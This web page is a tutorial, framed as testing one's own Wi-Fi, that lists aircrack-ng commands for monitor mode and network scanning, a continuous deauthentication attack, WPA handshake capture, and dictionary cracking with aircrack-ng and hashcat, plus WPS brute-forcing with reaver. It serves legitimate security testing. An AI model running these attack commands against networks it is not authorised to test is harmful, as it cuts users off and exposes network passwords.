Skip to content

2019

Wifi Cracking

Wifi Cracking Basic Commands

Performing a penetration test on your own Wi-Fi network using Kali Linux is a methodical process that leverages ethical hacking practices to uncover security weaknesses, ensuring your network is resilient against unauthorized access. This typically begins by configuring your wireless adapter into monitor mode, a specialized state that allows it to capture all nearby wireless traffic, rather than connecting to a single network. Tools like airmon-ng from the aircrack-ng suite are essential here, as they let you override interfering processes (e.g., disabling NetworkManager) and activate monitoring on interfaces such as wlan0, which is often renamed to wlan0mon once monitor mode is enabled. Once the adapter is ready, reconnaissance begins with airodump-ng, a tool that scans the airwaves to identify nearby networks, logging critical details like the target’s BSSID (MAC address), operating channel, and ESSID (network name).

1. Preparation

Enable Monitor Mode
  • Check your wireless interface (typically wlan0): 
    iwconfig
  • Kill interfering processes (like NetworkManager): 
    sudo airmon-ng check kill
  • Enable monitor mode on your interface (e.g., wlan0): 
    sudo airmon-ng start wlan0
    Your monitor interface will usually be renamed to wlan0mon.

2. Reconnaissance

Scan for Wi-Fi Networks
  • Use airodump-ng to detect nearby networks: 
    sudo airodump-ng wlan0mon
    Note your target's BSSID (MAC address), channel, and ESSID (network name).

3. Capture Handshake (WPA/WPA2)

Target a Specific Network
  • Start capturing packets on the target’s channel (e.g., channel 6): 
    sudo airodump-ng --bssid [BSSID] -c [Channel] --write [File_Name] wlan0mon
    Example: 
    sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write capture wlan0mon
    This saves data to capture.pcap.
Force a Handshake Capture (Deauth Attack)
  • Send deauthentication packets to trigger a reconnection: 
    sudo aireplay-ng --deauth 0 -a [BSSID] wlan0mon
    Use -c [Client_MAC] if targeting a specific client. Check airodump-ng for a handshake confirmation (top-right corner).

4. Crack the WPA/WPA2 Password

  • Use aircrack-ng with a wordlist (e.g., rockyou.txt): 
    sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
    Replace capture-01.cap with your file. Success depends on password strength and wordlist quality.

5. Optional: WPS Attacks (if enabled)

Brute-force WPS PIN with reaver:

sudo reaver -i wlan0mon -b [BSSID] -vv
Modern routers often block this, but older ones may be vulnerable.

6. Post-Test Cleanup

  • Restore your interface to managed mode: 
    sudo airmon-ng stop wlan0mon
  • Restart NetworkManager: 
    sudo systemctl start NetworkManager

Additional Tools & Notes

  • Wifite: Automates attacks (scan, capture, crack): 
    sudo wifite
    Wifite Github
  • Hashcat: Faster GPU-based cracking (convert .cap to .hccapx first): 
    hashcat -m 2500 [File].hccapx /usr/share/wordlists/rockyou.txt
    Hashcat Github
  • Wordlists: Use crunch to generate custom wordlists.
  • Legality: Only test networks you own or have explicit permission to test.

Ethical Considerations

  • Use strong passwords on your network to test security effectively.
  • Modern networks may have defenses (e.g., WPA3, rate-limiting), reducing the effectiveness of these attacks.